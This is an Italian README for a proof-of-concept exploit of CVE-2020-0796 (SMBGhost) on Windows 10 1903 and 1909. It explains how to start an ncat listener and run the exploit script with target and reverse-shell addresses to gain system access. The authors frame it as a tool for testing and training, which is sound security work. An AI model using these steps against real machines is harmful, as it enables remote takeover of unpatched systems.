
POC di Esecuzione Remota di Codice per CVE-2020-0796
Assicurati che Python e ncat siano installati.
Esegui calc_target_offsets.bat sul computer di destinazione e regola gli offset nella parte superiore del file SMBleedingGhost.py in base all'output dello script (vedi anche la nota sotto).
Esegui ncat con i seguenti argomenti da riga di comando:
ncat -lvp <port>
Dove <port> è il numero di porta su cui ncat sarà in ascolto.
Esegui SMBleedingGhost.py con i seguenti argomenti da riga di comando:
SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>
Dove <target_ip> è l'indirizzo IP del computer vulnerabile di destinazione. <reverse_shell_ip> e <reverse_shell_port> sono l'indirizzo IP e il numero di porta su cui è in ascolto.
Se tutto funziona correttamente, ncat mostrerà una shell che fornisce accesso di sistema al computer di destinazione.
Nota: Potresti chiederti perché sia necessario eseguire lo script calc_target_offsets.bat sul computer di destinazione, e se non vanifichi lo scopo stesso dell'esecuzione remota del codice che è remota. Questi offset non sono casuali e sono gli stessi su tutte le istanze Windows della stessa versione di Windows. Si potrebbe rendere l'attacco più universale rilevando la versione di Windows di destinazione e regolando automaticamente gli offset, o non facendo affidamento su di essi del tutto, ma è solo un POC e abbiamo fatto ciò che era più semplice. Vediamo anche come un aspetto positivo che il POC non sia universale e non sia comodo per usi diversi da test e formazione.

Le versioni di Windows 10 1903 e 1909 sono interessate. Le versioni non aggiornate di Windows 10 1903 non sono supportate a causa di un bug di dereferenziazione del NULL in Windows (corretto in KB4512941).
A causa della natura dello sfruttamento, il POC funziona meglio per target in esecuzione su un computer (o una VM) con un singolo processore logico. I target con più di un processore logico in esecuzione in VirtualBox dovrebbero essere supportati, ma in questo caso il POC è meno affidabile. Altri target potrebbero non essere supportati. Per maggiori dettagli, fare riferimento al nostro articolo tecnico qui sotto.